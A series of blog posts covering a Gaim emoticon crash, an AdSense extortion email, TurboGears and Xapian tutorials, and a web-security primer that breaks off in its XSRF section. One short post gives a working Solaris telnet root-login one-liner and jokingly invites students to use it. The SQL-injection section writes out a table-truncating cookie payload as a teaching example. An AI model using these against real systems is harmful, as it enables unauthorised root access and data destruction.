
Reported by Boris.

Back in December I posted about the technique I use to stop spam on phpBB forums. The following enhancement of this idea appeared today on the xkcd webcomic blog:

A new CAPTCHA approach

But it would not work, because even spambots cry at that.

It is very common to hear stories in which criminals ask restaurant or shop owners to pay for the criminals’ “protection services”. Those who dare not pay are usually sorry a few days later, when they find their business going up in flames.

Well, it seems that this phenomenon is now spreading in the blogosphere, as ShoeMoney, one of my favorite bloggers, received a letter asking him to pay protection money for protecting his Adsense income:

Subject: Alarm
From: “dragon dragon”
Date: Wed, March 7, 2007 1:05 pm
To: jeremy@shoemoney.com
————————————————————————–

This is a warning and if you don’t pay attention to it you will suffer from bad turns.
All your income is through Google Adsense and if you do not cooperate with us we will stop this income source. We would like you to pay us the total amount of USD 200 each month. This small amount could be considered as nothing compared to your earnings from Adsense. If you do not pay this amount we will have to close your account by the help of special robots and …! I am not happy to do this but I have to as there is no way out of it and I trust if you were me you would also have to do the same. I am an inventor and I have recently innovated a new design which will be accepted by scientific societies only if I can present a model in advance; and making the model takes money. They will register my new design only after they have checked all aspects of the same. My theory is changing the power into energy. If I succeed many big problems will be solved. All my design specification could be viewed in the following web log:

magnetic-machine.blogspot dot com

The magnets will be bought in installments and the amount you pay is to be paid monthly for the same. After the registration of my design, the entire amount which I received from you will be paid back.

If you collaborate with me, you have helped to the science. And if not, I will have to close your Google AdSense account. I seek your help for the sake of the Science and if you are not prepared to collaborate I will have to close your Google AdSense account

Oh well, at least he promises to pay the money back later.

It will probably be hard for you to believe, but my girlfriend discovered a DoS vulnerability in Gaim. No, don’t worry. She is not a computer geek (One in a relationship is certainly enough). The story of my girlfriend’s important discovery goes like this:

I was chatting with her some days ago using Gaim (she uses MS Messenger). At some point, she had sent me the following attack vector:

:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(
:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(
:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(
:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(
:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(:(

As she deeply disliked something I had said to her …

Gaim replaced each “:(” with a sad animated :( emoticon. For some mysterious reason, a few dozen sad emoticons made Gaim choke. CPU usage was at 100% and the system felt highly unresponsive. It was impossible to use Gaim at all.

Luckily, I was able to kill Gaim from the command line. I started it again hoping for the best. However, when I opened the chat window again, the attack vector was still there (retrieved from the logs) and Gaim choked yet again. I had to manually remove the last few lines from the log files so that I could speak with her again.

To make a long story short, my girlfriend is now happy again.

Note: This episode of Thesamet.com was recorded 10 days ago, when Gaim developers were notified of this.

Clarification: For some reason, some people consider this to be a chauvinistic post. My girlfriend is a very intelligent person; she is simply not interested in software security. We were both surprised that she unintentionally discovered this. That’s it.

P.S.: The first paragraph of this post was written by her. She said it will help it to “do well on digg”.

This is the second installment of the lecture I gave at the Israeli Pythoneers Meeting. In case you missed it, I recommend reading the first part before this one.

At this point, I closed OpenOffice Impress and said that I would demonstrate how quickly you could get a functional Web application up and running with TurboGears.

Setting Things Up

I’ve quick-started a new project called TurboGallery…

$ tg-admin quickstart
Enter project name: TurboGallery
Enter package name [turbogallery]: <Enter>
Do you need Identity (usernames/passwords) in this project? [no] <Enter>

…and gone inside its directory to run it:

$ cd TurboGallery
$ python start-turbogallery.py


I started Firefox and browsed to http://localhost:8080. “There is already something to see on the site,” I said. The TurboGears’ default welcome page was showing up.

“The next thing I always do is to delete the entire body of the welcome template.” So, I opened welcome.kid in my favorite text editor and did just that. I then refreshed the page in Firefox. All the contents were gone except for the TurboGears’ header and the footer, which said, “TurboGears under the hood.” Someone asked if there was any way to remove those two remaining items. “Absolutely,” I said. It was time to mention master.kid. I opened the file and explained that it is used to render the layout that is common to all pages. As such, you do not have to duplicate it in all your templates. I next removed the TurboGears’ footer but left the header in its place.

I then opened model.py and added a class that would represent a single photo:

from datetime import datetime

class Photo(SQLObject):
    title = UnicodeCol()
    date = DateTimeCol(default=datetime.now)
    image = BLOBCol()
    thumbnail = BLOBCol()

A photo will have a title and a date field, which indicates the time it was uploaded. The field’s default argument makes the date of a newly created photo object be the current date. That way, you don’t need to specify this information every time you create a new photo. In the above definition, we don’t give the date field the current time. Rather, we give it a function that returns the current time. Whenever a photo is created, this function will be called to determine the value for this field. We store the images inside the database together with a thumbnail. BLOB stands for binary large object. The thumbnail part was not actually used in the tutorial.
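The difference between passing the current time and passing a function that returns it can be shown in isolation. The following is only a rough sketch: the Column class and its initial_value() method are hypothetical stand-ins written for this illustration, not part of SQLObject.

```python
from datetime import datetime
import time

class Column(object):
    """Hypothetical stand-in for a column definition (not SQLObject's API)."""

    def __init__(self, default=None):
        self.default = default

    def initial_value(self):
        # A callable default is invoked each time a row is created;
        # a plain value is simply reused as-is.
        if callable(self.default):
            return self.default()
        return self.default

frozen = Column(default=datetime.now())  # evaluated once, right here
fresh = Column(default=datetime.now)     # evaluated on every call

first = fresh.initial_value()
time.sleep(0.01)
second = fresh.initial_value()

print(frozen.initial_value() == frozen.initial_value())  # one fixed moment
print(second > first)                                     # a new timestamp per call
```

With the frozen variant, every photo would carry the time at which model.py was loaded, which is why the model passes datetime.now without parentheses.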

Next, I created a database with

$ tg-admin sql create

I was then asked how TurboGears knows where and how to access the database. I replied that the default TurboGears’ setting uses SQLite, which creates a database-in-a-file. It is very convenient to have your database readily available as a normal file while your project is in its development and testing phases.

To save time, I had prepared in advance a database that contained four photos. I replaced the database file that had just been created with my copy. The next thing to do was to display the photos on the main page. I modified the index() method into…

@expose(template="turbogallery.templates.welcome")
def index(self):
    photos = Photo.select()
    return dict(photos=photos)

…and uncommented the “from model import *” line. The index() method is called whenever the front page of the Web site is viewed. I explained the expose() decorator, which makes a method available to the outside world. Without it, the method could not be accessed from the Web. The template argument specifies which template should be used to render the page.

The index() method gets a list of all photos from the database and returns it inside a dictionary. TurboGears passes this dictionary to the template. I then moved back to welcome.kid and added the following to the body:

<ul>
     <li py:for="photo in photos">${photo.title}</li>
</ul>
<hr/>

I refreshed the page, and the list of photos was displayed. It is educational to view the source of the resulting page, but the people who were listening to my lecture wanted to see the photos straightaway.

Seeing Some Photos

To see the photos, we’ll have to add an IMG element to the list. The IMG element will get the photo file from another URL. I’ve changed the welcome.kid list into…

<ul class="photo_list">
    <li py:for="photo in photos">
        <img src="/images/${photo.id}"
              id="image${photo.id}" width="160"/>
<br/>
        <a href="/photo_info/${photo.id}">${photo.title}</a>
    </li>
</ul>
<hr/>

…and then added the following images() method to the controller:

@expose()
def images(self, photo_id):
    return "Hello "+photo_id

I next browsed to /images/world, and the browser displayed “Hello world.” The goal of this step was to demonstrate to the audience how TurboGears (CherryPy) maps URLs to methods. It was also intended to illustrate how easily a part of the URL can be transformed into positional arguments.
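To give a feeling for what happens behind the scenes, here is a toy dispatcher. It is a simplified sketch and not how CherryPy is actually implemented: the expose() and dispatch() functions below are written for this illustration only, and returning None stands in for a "404 Not Found" response.

```python
def expose(func):
    """Mark a method as reachable from the Web (toy version)."""
    func.exposed = True
    return func

class Root(object):
    @expose
    def images(self, photo_id):
        return "Hello " + photo_id

    def secret(self):
        # Not decorated, so the dispatcher refuses to call it.
        return "not reachable"

def dispatch(root, path):
    """Resolve '/images/world' to root.images('world')."""
    parts = [p for p in path.split("/") if p]
    if not parts:
        return None
    handler = getattr(root, parts[0], None)
    if handler is None or not getattr(handler, "exposed", False):
        return None  # stands in for a 404 response
    # The remaining path segments become positional arguments.
    return handler(*parts[1:])

print(dispatch(Root(), "/images/world"))
print(dispatch(Root(), "/secret"))
```

The first path segment selects the method, and whatever follows it is handed over as positional arguments, which is the behaviour the "Hello world" demonstration relied on.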
The right thing to put in the images() method would be a query that obtains the photo from the database and returns the associated JPEG file. Here is the code:

    @expose(content_type='image/jpeg')
    def images(self, photo_id):
        photo = Photo.get(photo_id)
        return photo.image

I refreshed the page, and the photos I’d prepared were now showing. (I also changed the CSS file when no one was looking to have this layout.)
Evangelizing Firefox in Thailand
In the second picture, you can see me evangelizing for the use of Firefox in Thailand.
Since this is just an example application to make things simple, the image is sent in full size and is resized by the browser.
Clicking on the caption below the images sends us to a page we haven’t yet created. This page will display the photo in full size together with some statistics on it. I saved welcome.kid as photo_info.kid and changed the body contents to:

    <h1>Photo Details for "${photo.title}"</h1>

    <img id="image${photo.id}" src="/images/${photo.id}"/>

    <ul>
        <li>Image size: ${len(photo.image)} bytes</li>
        <li>Uploaded at: ${photo.date}</li>
    </ul>

The corresponding method in controllers.py would be:

    @expose(template="turbogallery.templates.photo_info")
    def photo_info(self, photo_id):
        photo = Photo.get(photo_id)
        return dict(photo=photo)

Share Your Photos

An online gallery application is quite useless if its users can’t upload photos from their own computers. As such, we need to create an image upload form. In TurboGears, creating forms and validating user input is very easy. I’ve added a form definition to the top of controllers.py. The first part defines the fields:

from turbogears.widgets import *
from turbogears import *

class AddPhotoFields(WidgetsList):
    title = TextField(label='Title:')
    image = FileField(label='Photo:')

The form will have a text input field for the title of the photo as well as a field that enables the selection of an image file from the user’s computer. The second part of the definition is the validation schema for this form:

class AddPhotoSchema(validators.Schema):
    title = validators.String(not_empty=True, max=16)

“The touchiest issue with any Web application is its users,” I said. “Without them, there is no need to worry about bugs or invalid input.” Validation makes sure the input your Web application receives is sound. In many cases, further validation is needed. The above validator makes sure the title is not empty and is no longer than 16 characters. One audience member asked if the validation can be specified inside the fields definition. Yes, it is possible to specify a validator as a keyword argument to a field definition, but keeping the validation schema outside the fields definition makes it possible to define a more complex schema that involves field dependencies or logical operators. A common instance where such a schema is useful is the validation of a registration form, where you have to check whether the text entered in the password field matches the text in the “reenter password” field.
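To make the idea of a rule that spans several fields more concrete, here is a plain-Python sketch of the registration example. It deliberately avoids the TurboGears validators; the function validate_registration() and the field names user_name, password and password_confirm are made up for this illustration.

```python
def validate_registration(fields, max_name_length=16):
    """Return a dict of error messages keyed by field name (empty if valid)."""
    errors = {}

    # Per-field rules: each one looks at a single value.
    name = fields.get("user_name", "")
    if not name:
        errors["user_name"] = "Please enter a value"
    elif len(name) > max_name_length:
        errors["user_name"] = (
            "Enter a value of at most %d characters" % max_name_length)

    # Cross-field rule: it needs two values at once, which is why it
    # belongs to the schema rather than to either field.
    if fields.get("password") != fields.get("password_confirm"):
        errors["password_confirm"] = "Passwords do not match"

    return errors

print(validate_registration(
    {"user_name": "boris", "password": "abc", "password_confirm": "abd"}))
```

The password check cannot live on either field alone, since neither field knows about the other. That is the kind of dependency a separate schema is meant to express.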

The last part of the form definition ties the previous two parts together, with text for the submit button and a URL that will handle the form data:

add_photo_form = TableForm(fields=AddPhotoFields(),
        validator=AddPhotoSchema(),
        submit_text='Upload!',
        action='/upload',
        )

I’ve created a template named add.kid that will display just the form:

   <h1>Add New Photo</h1>
    ${form()}

I’ve also added a controller method to make this page accessible…

    @expose(template="turbogallery.templates.add")
    def add(self):
        return dict(form=add_photo_form)

…and I’ve linked to it from welcome.kid.

Here is a screenshot of this page:
Add photo form
As you can see, TurboGears gives us a nice form without us having to type in any HTML at all. Clicking the Upload! button posts the data to the /upload URL. To test the form, I’ve added the corresponding method to the controller:

    @expose()
    @validate(form=add_photo_form)
    @error_handler(add)
    def upload(self, title, image):
        return "hi"

The decorators that are attached to this method make TurboGears validate its input using the add_photo_form. If a validation error occurs, the response is handled by the add() method, which just displays the form again along with the validation errors. So if, for example, we type in a too-long title, we will get the following:
TurboGears form validation errors
I would now really like to make the method save the image in a new photo object. The following code will do:

    @expose()
    @validate(form=add_photo_form)
    @error_handler(add)
    def upload(self, title, image):
        image = image.file.read()
        Photo(title=title, image=image, thumbnail=None)
        flash("Image successfully added!")
        raise redirect('/')

Yes, handling a file upload in TurboGears is just a matter of reading from a file-like object. It is that simple. The next line creates a photo object with the title and the image data. The flash() method makes the given message appear on the next page, and we redirect to the main page. I filled out the form to upload an image that was downloaded from my camera. Here’s what I got:
Rotate photos in TurboGears
Damn! I hate it when my camera decides to rotate an image that has already been uploaded. So, let’s add an AJAX image-rotation tool. A click on the rotate link will rotate the image in place without requiring the entire page to be reloaded. We first add a method to rotate the image to our controller:

    @expose('json')
    def rotate(self, photo_id):
        import Image
        from cStringIO import StringIO
        photo = Photo.get(photo_id)
        image = Image.open(StringIO(photo.image))
        rotated = image.rotate(90)
        photo.image = rotated.tostring('jpeg', 'RGB')
        return dict(photo_id=photo_id, size=rotated.size)

The method uses PIL – Python Imaging Library. It loads the image from the database, rotates it, and then stores it again in the database. The method returns a dictionary containing the photo_id and the new photo dimensions. It is set to return the data in JSON format, which makes it extremely easy to use in Javascript. I directly entered http://localhost:8080/rotate/2 to show what the JSON object looks like. I then refreshed the main page to verify that the photo had been rotated. Next, I rotated it three more times until it was straight again.

I then went back to welcome.kid and added a rotate link for each photo:

<ul class="photo_list">
    <li py:for="photo in photos">
        <img src="/images/${photo.id}"
              id="image${photo.id}" width="160"/>
<br/>
        <a href="/photo_info/${photo.id}">${photo.title}</a>
        <a href="#" onclick="rotate_photo(${photo.id}); return false;">(rotate)</a>
    </li>
</ul>

Clicking on the “rotate” text located next to a photo will call a Javascript function that receives the corresponding photo ID. I’ve added the implementation of rotate_photo() to the top of the welcome.kid template. It uses MochiKit, which must be enabled in config/app.cfg (it is explained how to do so in that file).

<script type="text/javascript">
    function rotate_photo(photo_id) {
        var d = loadJSONDoc('/rotate/'+photo_id);
        d.addCallback(update);
    }

    function update(r) {
       $('image'+r.photo_id).src='/images/'+(r.photo_id)+'?random='+Math.random();
    }
</script>

The function makes an asynchronous call to the rotate URL, providing it with the photo ID. Once the response arrives, update() is called and is provided with the JSON object we returned from the controller’s rotate() method. In JavaScript, you can use dot notation to access the keys in that dictionary. When update() is called, the image has already been rotated at the server. Therefore it is the right time for the browser to fetch it again. To perform this re-fetching, update() sets the image src attribute to the image URL, but in order to prevent the browser from displaying the cached old image, we add a random argument to the URL. You can see a related post describing how to prevent browsers from caching. To make the images() controller method accept this argument and ignore it, its definition becomes:

def images(self, photo_id, random=None):

I then refreshed the main page and rotated the photos a few times to demonstrate how slick this functionality is (especially when you’re working on the server). You can see it in the video below:

Next, I uploaded another image I had prepared in advance, this one called questions.jpg, using the upload form. Here it is:

It says “Questions?” in Hebrew, signifying that the lecture was over and it was time to ask questions.

Download the full source code of TurboGallery.

If you happen to find a Sun Solaris server with a telnet daemon running, it is very likely that you can get superuser access on it by just typing:

$ telnet -l "-froot" server

where server is the server name. I was able to confirm this on a Solaris server nearby.

It’s amazing to see that this one was overlooked for so long, and that using this exploit does not require any skill whatsoever. If root logins through telnet are disabled, you may still be able to log in as any other user (think sysadmin’s user account + keystroke recorder).

While the telnet port is usually blocked to servers on the internet, it is quite common that it is left open inside local networks, and especially in universities. So go ahead and look for Solaris rootkits: the exam period is just around the corner :)

Source: Errata Security blog.

One month ago, I gave an introductory speech about TurboGears at the Israeli Pythoneers Meeting. The discussion consisted of two parts. The first part introduced TurboGears, and the second part included live coding of a Flickr clone.


I hereby give the lecture again, in a written format. These are the original slides used in the lecture. Click on a slide to enlarge it.

Continue Reading »

What good is an application, no matter how much information it contains, if the inability to easily search it renders it useless?

Xapian to the Rescue

Xapian is an excellent open source (GPL) search engine library. It is written in C++ and comes with bindings for Python as well as many other languages, and it supports everything you’d expect from a modern search engine:

  • Ranked probabilistic search – The results that are returned are ranked according to their relevancy, with the most relevant occurring first.
  • Boolean search operators – You can use AND, OR, NOT, XOR in your searches.
  • Phrase and proximity searching – For example, “used books” will look for occurrences of these words as an exact phrase, but you can also search for “used NEAR books” to find occurrences of the words “used” and “books” that are within 10 words of each other. You can even write “used NEAR/3 books” to change the proximity threshold to three.
  • Stemming of search terms – If, for example, you search for “programmer,” you can find articles that mention “programmers” or “programming.” Xapian currently supports stemming in Danish, Dutch, English, Finnish, French, German, Italian, Norwegian, Portuguese, Russian, Spanish, and Swedish.
  • Stopwords – Xapian already knows which common words to ignore (like ‘are,’ ‘is,’ and ‘being’).
  • Simultaneous update and searching – Xapian allows you to index new articles while the database is being searched. New articles can be searched right away.
  • Relevant Suggestions – Xapian can automatically suggest documents that are relevant to a given document. As such, you can add a list of “similar items” to each page.
  • Value-associated results – You can associate values like word-count, date, page views, diggs, and so on with each document. Xapian can return results that are sorted by any of these criteria.
  • Document metadata – You can add metadata tags to each document (Xapian calls these terms). These tags can be anything you desire, like author, title, date, tags, and so on. Users can then search within the metadata by typing “author:john”.

Xapian diagram medium

The above diagram shows the main participants in a typical search-enabled use case. We assume that the data to be searched is stored in a relational database (the blue SQL server jar), but it doesn’t really matter where the data comes from. The indexer is a Python program that is executed periodically (as a cron job). Its function is to retrieve new or changed documents from the database and to index them. The Xapian library handles the actual read/write operations on the Xapian database (in the purple jar).

Since the Xapian library is not thread-safe and because Web applications are usually multithreaded, you need to implement a locking mechanism if you want access to a Xapian database to be safe. My preferred way for accomplishing this aim is to use a separate process (the orange Search Server box). This process will be a single-threaded RPC server that will handle all searches. The benefit of this strategy is that you can move the search server process (together with the Xapian database) to a different machine. In so doing, you can free up a lot of the resources on that server that runs your application. That makes the system very scalable. In general, you can expect any bottlenecks to be more IO and memory related than CPU related.

Alternatively, your search operations can be directly initiated from your application process. This alternative will work as long as you use a mutex to govern access to your database. However, I wouldn’t recommend doing this in a production environment. Why? Because you’ll never be sure what’s consuming so much memory—the Xapian library or your application.
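For completeness, the mutex alternative could look roughly like the sketch below. It assumes nothing about Xapian itself: LockedSearcher and fake_search() are hypothetical names, and fake_search() merely records how many threads are inside it at once so the effect of the lock is visible.

```python
import threading
import time

class LockedSearcher(object):
    """Serialize calls to a search function that is not thread-safe."""

    def __init__(self, search_func):
        self._search = search_func
        self._lock = threading.Lock()

    def search(self, query, offset, count):
        # Only one thread at a time may run the wrapped function.
        with self._lock:
            return self._search(query, offset, count)

stats = {"active": 0, "max_active": 0}

def fake_search(query, offset, count):
    # Hypothetical stand-in for the real search; it records how many
    # threads are inside it at the same moment.
    stats["active"] += 1
    stats["max_active"] = max(stats["max_active"], stats["active"])
    time.sleep(0.001)
    stats["active"] -= 1
    return {"count": 0, "results": []}

searcher = LockedSearcher(fake_search)
threads = [threading.Thread(target=searcher.search, args=("python", 0, 10))
           for _ in range(8)]
for t in threads:
    t.start()
for t in threads:
    t.join()

print(stats["max_active"])
```

Because every call goes through the same lock, the wrapped function never sees two threads at once. The price is that all searches in the application wait in a single queue.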

The application (red box) gets a very clean search API. It simply connects to the XML RPC server (one line of code) and obtains access to a search() method which gets the search query and how many results are needed as arguments. It then returns a dictionary with the total number of available results and the results themselves.

In this tutorial, we’ll create a searchable article database. We assume that you already have Xapian and the Xapian bindings installed. We’ll start with the indexer.

The Indexer: The Golden Retriever

Following is the indexer code. It is tailored to TurboGears and SQLAlchemy, but it can be easily adapted to suit any ORM. It accepts three command line arguments: the configuration file, which helps it find the database (either dev.cfg or prod.cfg); the Xapian database location, which is simply a directory name; and a number of hours (such that all documents that were created or modified within this number of hours will be indexed). If you run the indexer every hour, you can safely give 2 as the third argument. If you’d like to re-index all articles, pass in 0 as the third argument.

#!/usr/bin/env python
import re
import sys
from datetime import datetime, timedelta

import turbogears
import xapian

# a "word" is a run of 1 to 32 word characters
WORD_RE = re.compile(r"\w{1,32}", re.U)
ARTICLE_ID = 0  # number of the value slot that holds the article ID

stemmer = xapian.Stem("en") # english stemmer

def create_document(article):
    """Gets an article object and returns
    a Xapian document representing it and
    a unique article identifier."""

    doc = xapian.Document()
    text = article.text.encode("utf8")

    # go word by word, stem it and add to the
    # document.
    for index, term in enumerate(WORD_RE.finditer(text)):
        doc.add_posting(
          stemmer.stem_word(term.group()),
          index)
    doc.add_term("A"+article.submitted_by.user_name)
    doc.add_term("S"+article.subject.encode("utf8"))
    article_id_term = 'I'+str(article.article_id)
    doc.add_term(article_id_term)
    doc.add_value(ARTICLE_ID, str(article.article_id))
    return doc, article_id_term

def index(db, period):
    """Index all articles that were modified
    in the last <period> hours into the given
    Xapian database"""

    if period:
        start = datetime.now()-timedelta(hours=period)
        query = (Article.q.last_modified>start)
    else:
        # a period of 0 means "re-index everything"
        query = None
    articles = session.query(Article).select(
       query)

    for article in articles:
        doc, id_term = create_document(article)
        db.replace_document(id_term, doc)

if __name__=="__main__":
    configfile, dbpath, period = sys.argv[1:]
    turbogears.update_config(configfile=configfile,
        modulename="myproject.config")
    # makes the project's model classes (such as Article) available
    from myproject.model import *
    turbogears.database.bind_meta_data()
    db = xapian.WritableDatabase(dbpath,
        xapian.DB_CREATE_OR_OPEN)
    index(db, int(period))

All strings that are passed to Xapian functions must be encoded in UTF-8. The create_document() function splits the article’s text into words, stems them, and then adds them one by one to the Xapian document. Next, two terms are added: the username of the article’s author, prefixed by the letter ‘A,’ and the article’s subject, prefixed by the letter ‘S.’ By convention, the first character of each term acts as a prefix that gives the term its meaning. You’ll see how we use these terms when we code the search server.
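If you don’t have Xapian at hand, the word-splitting and prefixing steps can be tried out with the standard library alone. This is only an approximation: toy_stem() is a crude placeholder for a real stemmer, and build_terms() is a name invented for this sketch.

```python
import re

WORD_RE = re.compile(r"\w{1,32}", re.U)

def toy_stem(word):
    """Crude stand-in for a real stemmer: lowercase, drop a final 's'."""
    word = word.lower()
    if word.endswith("s") and len(word) > 3:
        return word[:-1]
    return word

def build_terms(text, author, subject):
    # Postings keep the position of each word, which is what makes
    # phrase and proximity searches possible later on.
    postings = [(position, toy_stem(match.group()))
                for position, match in enumerate(WORD_RE.finditer(text))]
    # Prefixed terms carry the metadata: 'A' for author, 'S' for subject.
    terms = ["A" + author, "S" + subject]
    return postings, terms

postings, terms = build_terms(
    "Python programmers love searching", "john", "Xapian")
print(postings)
print(terms)
```

The positions stored with each word are the same kind of information that add_posting() receives in the indexer, while the prefixed strings correspond to the add_term() calls.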

Another term, this one prefixed by the letter ‘I,’ is then added to serve as a unique article ID. The article ID is also assigned to the document as a value. This number relates a Xapian document to its original source in the SQL server.

The index() function simply selects the relevant articles and builds a Xapian document object for each of them. Instead of using add_document(), which can cause an article to be indexed multiple times in the database, we use replace_document(), which is given a unique term. If a document is already indexed by the given term, it will be replaced with the given document; otherwise, a new document will be added to the database.
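The difference between the two calls is easiest to see on a toy model. The ToyIndex class below is not Xapian and only imitates the behaviour described above, storing each document as a set of terms plus a payload.

```python
class ToyIndex(object):
    """Toy model of an index; each entry is (set_of_terms, payload)."""

    def __init__(self):
        self.docs = []

    def add_document(self, terms, payload):
        # Always appends, even if the same article was indexed before.
        self.docs.append((set(terms), payload))

    def replace_document(self, unique_term, terms, payload):
        # Drop whatever is already indexed by the unique term, then add.
        self.docs = [d for d in self.docs if unique_term not in d[0]]
        self.docs.append((set(terms), payload))

appended = ToyIndex()
appended.add_document(["I15", "python"], "first version")
appended.add_document(["I15", "python"], "edited version")

replaced = ToyIndex()
replaced.replace_document("I15", ["I15", "python"], "first version")
replaced.replace_document("I15", ["I15", "python"], "edited version")

print(len(appended.docs))
print(len(replaced.docs), replaced.docs[0][1])
```

Running the indexer every hour with a two-hour window means most articles are seen twice, so the replacing behaviour is what keeps the search results free of duplicates.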

After the data is indexed, it is time to make it searchable.

The Search Server: Seeing Results

The role of the search server is to obtain queries from the application and to then return results. As we strive for a single-threaded implementation, the Twisted framework makes it extremely easy to write the code for this server. If you are not familiar with Twisted or XML RPC, don’t worry; just imagine we’re writing a controller with only one method exposed: xmlrpc_search().

import xapian

from twisted.web import xmlrpc, server
from twisted.internet import reactor, task
from time import time
from indexer import ARTICLE_ID

DEFAULT_SEARCH_FLAGS = (
        xapian.QueryParser.FLAG_BOOLEAN |
        xapian.QueryParser.FLAG_PHRASE |
        xapian.QueryParser.FLAG_LOVEHATE |
        xapian.QueryParser.FLAG_BOOLEAN_ANY_CASE
        )

class SearchServer(xmlrpc.XMLRPC):
    def __init__(self, db):
        xmlrpc.XMLRPC.__init__(self)
        self.db = xapian.Database(db)
        self.parser = xapian.QueryParser()
        self.parser.add_prefix("author", "A")
        self.parser.add_prefix("subject", "S")
        self.parser.set_stemmer(xapian.Stem("en"))
        self.parser.set_stemming_strategy(xapian.QueryParser.STEM_SOME)

        # make sure database is reloaded every 10 minutes
        lc = task.LoopingCall(self.reopen_db)
        lc.start(600)

    def reopen_db(self):
        try:
            self.db.reopen()
        except IOError:
            print "Unable to open database"

    def xmlrpc_search(self, query, offset, count):
        """Search the database for <query>, return
        results[offset:offset+count], sorted by relevancy"""

        query = self.parser.parse_query(query.encode("utf8"),
                DEFAULT_SEARCH_FLAGS)
        enquire = xapian.Enquire(self.db)
        enquire.set_query(query)
        try:
            mset = enquire.get_mset(offset, count)
        except IOError, e:
            if "DatabaseModifiedError" in str(e):
                self.reopen_db()
            raise

        results = []
        for m in mset:
            results.append(
                {"percent": m[xapian.MSET_PERCENT],
                "article_id": m[xapian.MSET_DOCUMENT].get_value(ARTICLE_ID)})
        return {"count": mset.get_matches_upper_bound(), "results": results}

import sys

if len(sys.argv)!=3:
    print "Usage: search.py <port> <db>"
    sys.exit(1)

reactor.listenTCP(int(sys.argv[1]), server.Site(SearchServer(sys.argv[2])))
reactor.run()

The search server constructor opens a database and initializes a query parser. We tell the query parser that the keyword ‘author’ refers to terms that are prefixed with the letter ‘A’ and that the keyword ’subject’ refers to terms that are prefixed with the letter ‘S.’ This specification makes it possible to search for “author:john” or “subject:xapian.”

We then instruct Twisted to call reopen_db() every ten minutes. This reopening renders the latest changes in the database available to the search server. Each time Xapian’s library opens the database, it works against a fixed revision of it.

The xmlrpc_search() method is the only one that is exposed (since its name is prefixed by xmlrpc_). The offset (zero-based) and count arguments allow for an efficient way to split the search results into several pages. The call returns a dictionary with the total number of available results and a list with the selected subset of results. Each item in the list contains a unique article_id and a percent, which indicates each document’s relevancy score.
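On the application side, paging then boils down to a bit of arithmetic. The helpers below are a small sketch; page_window() and page_count() are hypothetical names, and pages are assumed to be numbered from 1.

```python
def page_window(page, per_page=10):
    """Translate a 1-based page number into (offset, count)."""
    if page < 1:
        raise ValueError("page numbers start at 1")
    return (page - 1) * per_page, per_page

def page_count(total, per_page=10):
    """Number of pages needed to show <total> results."""
    return (total + per_page - 1) // per_page

offset, count = page_window(3, per_page=20)
print(offset, count)
print(page_count(41, per_page=20))
```

The offset and count pair is what you would pass on to the search() call. Keep in mind that the total returned by the server comes from get_matches_upper_bound(), so the number of pages computed from it is an upper estimate rather than an exact figure.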

The program receives the port number to listen on and the Xapian database path. Unless you’d like to expose your search functionality to the world, it is suggested that you block outside access to this port.

By now, you’re probably eager to try searching your own database. Here’s a quick way to do so. First, start the search server:

$ python search.py 3000 ./my_database

From another terminal, start a Python shell:

>>> import xmlrpclib
>>> s = xmlrpclib.Server('http://localhost:3000')
>>> s.search('python -snake', 0, 10)
{'count': 2, 'results': [{'percent': 94, 'article_id': 15}, {'percent': 79, 'article_id': 6}]}

In the same manner, you can use the search server from your application.

Working with Smaller Databases

Search engines are optimized to return results that are sorted according to their relevancy. If you need your results sorted by another criterion, such as date or diggs, it might be useful to run the query over a smaller database. For example, you might try running it over a database that contains only articles from the previous month. This strategy can significantly increase your overall performance.

Alternatives to Xapian

While I haven’t tried working with search engine libraries other than Xapian, you can try the Java-based Lucene, which can be accessed from Python using PyLucene. The TurboLucene library makes it easier to use PyLucene from TurboGears.

Arm yourself and prepare for battle! This post is intended as a reminder about the possible security attacks your Web application may be vulnerable to. While it is not meant as a comprehensive guide to Web-application security, it can give you some ideas on how to better protect your applications.

SQL Injection Attacks

The joy of using an ORM like SQLAlchemy or SQLObject—in addition to the benefit of not having to write a single SQL statement yourself—is its ability to protect you from SQL Injection attacks. Although this built-in security measure affords you protection, it is important to understand how SQL injection attacks work.

If an application contains code that looks like this…

def get_user(self):
    # Vulnerable: the cookie value is pasted straight into the SQL text.
    mysql.execute(
        "SELECT * FROM users WHERE user_id='%s'" %
            cherrypy.request.cookies['user_id'].value)
    …

…then you are vulnerable to the stinging strikes of a malicious user. That’s because he or she can craft a cookie with the value "someonebad'; TRUNCATE TABLE users; SELECT '". The SQL statement that will be executed will then be:

SELECT * FROM users WHERE user_id='someonebad';
     TRUNCATE TABLE users; SELECT ''

…which is not good, not good indeed!

To see just how bad the situation really is for our fellows in PHP land, have a look at these Google code search results, or for our little brothers in ASP land, have a look here. Please act responsibly and don’t hack into the sites listed there. :)

Luckily, ORMs escape all the strings we send to the database engine, and as a result, we are protected from this kind of harmful attack.
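
If you do end up writing a query by hand, the same kind of protection is usually available through query parameters. Here is a minimal sketch of that idea. It uses the sqlite3 module from the standard library rather than the MySQL connection from the example above, and the table layout and the get_user helper are assumptions made only for this illustration.

```python
import sqlite3


def get_user(conn, user_id):
    # The ? placeholder makes the driver pass user_id as data,
    # so it is never interpreted as part of the SQL statement.
    cur = conn.execute(
        "SELECT user_id, name FROM users WHERE user_id = ?", (user_id,))
    return cur.fetchone()


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (user_id TEXT PRIMARY KEY, name TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'Alice')")

evil = "someonebad'; TRUNCATE TABLE users; SELECT '"
print(get_user(conn, evil))     # None: just an odd-looking user id
print(get_user(conn, "alice"))  # the row for alice is still there
```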

XSRF: Cross-Site Request Forgery

This exploit is very common in Web applications, especially in those that provide an AJAX API. It is best to describe this type of attack with an example. Suppose that an imaginary project, TGBank (which is a Web interface for a bank), has a send_money() method:

    @expose()
    def send_money(self, to_whom, how_much):
        # validate that user has enough money
        transfer_money(
            from_user=identity.current.user.user_id,
            to_user=to_whom,
